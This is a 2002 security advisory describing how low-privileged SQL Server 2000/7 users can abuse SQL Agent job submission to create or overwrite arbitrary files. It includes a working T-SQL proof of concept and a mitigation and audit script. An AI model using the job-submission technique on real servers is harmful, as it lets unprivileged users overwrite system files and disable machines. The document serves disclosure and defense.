Arbitrary File Creation/Overwrite with SQL Agent Jobs

August 19th, 2002

NGSSoftware Insight Security Research Advisory

Name: Arbitrary File Creation/Overwrite with SQL Agent Jobs

Systems: Microsoft SQL Server 2000 and 7

Severity: High Risk

Category: Arbitrary File Creation/Overwrite

Vendor URL: http://www.microsoft.com/

Author: David Litchfield (david@ngssoftware.com)

Advisory URL: http://www.ngssoftware.com/advisories/mssql-espjobs2.txt

Date: 19th August 2002

Advisory number: #NISR19002002A

Description

***********

With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
Server Agent. The Agent is responsible for restarting the database service
if it stops for some reason, has a role to play in replication and runs
scheduled jobs. As the public role can submit jobs to the SQL Agent by
default, a low privileged user can create or overwrite arbitrary files on
the SQL Server.

Details

*******

When adding a job one can specify the name of a file to output the results
of the Transact-SQL or CmdExec job to. If this file already exists it can be
overwritten, and if it doesn't exist a new file will be created. By
crafting the query of the job one can place arbitrary contents in this file.
If the SQL Server Agent is running with Local SYSTEM privileges an attacker
will be able to overwrite key operating system files, rendering the server
unbootable.

Proof of Concept

****************

-- ArbitraryFileCreate
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
-- David Litchfield
-- (david@ngssoftware.com)
-- 19th August 2002

USE msdb

EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1

EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'

EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'

EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

Fix Information

***************

NGSSoftware informed Microsoft of these issues in July. To prevent low
privileged users from submitting jobs one should disallow public access to
the job related stored procedures in the MSDB database, particularly:

sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job

Further to this, ensure that the SQL Server Agent is running as a low
privileged NT account.
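
One way to apply and check the workaround above, as an added example that is not part of the original advisory. It assumes a sysadmin session on the affected server; the audit query in step 3 is an extra check for existing job steps that write to an output file.

```sql
-- Added example, not from the advisory. Run as a sysadmin.
USE msdb
GO

-- 1. Remove public's ability to submit and start Agent jobs.
REVOKE EXECUTE ON dbo.sp_add_job       FROM public
REVOKE EXECUTE ON dbo.sp_add_jobstep   FROM public
REVOKE EXECUTE ON dbo.sp_add_jobserver FROM public
REVOKE EXECUTE ON dbo.sp_start_job     FROM public
GO

-- 2. List the permissions that remain on each procedure.
--    public should no longer appear as a grantee of Execute.
EXEC sp_helprotect @name = 'sp_add_job'
EXEC sp_helprotect @name = 'sp_add_jobstep'
EXEC sp_helprotect @name = 'sp_add_jobserver'
EXEC sp_helprotect @name = 'sp_start_job'
GO

-- 3. Audit existing jobs: every step that writes its results to a file,
--    with the login that owns the job. Review any path or owner that
--    is not expected.
SELECT j.name                   AS job_name,
       SUSER_SNAME(j.owner_sid) AS job_owner,
       j.delete_level,
       s.step_name,
       s.subsystem,
       s.output_file_name
FROM   dbo.sysjobs j
JOIN   dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE  s.output_file_name IS NOT NULL
  AND  s.output_file_name <> ''
ORDER BY job_owner, j.name
GO
```

Logins that legitimately schedule jobs without sysadmin rights will need EXECUTE granted back to them individually after step 1. A job created with a non-zero @delete_level, as in the proof of concept, is removed after it runs and so may not appear in step 3.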
